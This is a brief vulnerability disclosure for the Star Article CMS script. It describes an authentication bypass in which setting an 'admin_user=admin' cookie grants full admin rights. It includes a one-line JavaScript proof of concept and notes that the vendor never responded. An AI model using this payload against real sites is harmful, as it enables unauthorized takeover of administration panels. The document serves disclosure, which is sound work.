Star Article is a “Ready to use article, news, joke, tutorial site script with more features than you can think of”. Leads to full administration rights on the CMS admin panel via insecure cookie handling.

Name – admin_user
Content – admin
Path – /

Proof of Concept:

javascript:document.cookie=”admin_user=admin; path=/”

Vendor was contacted three times over a 30 day period and didn’t not respond to any of the emails.

The full advisory can be found Here.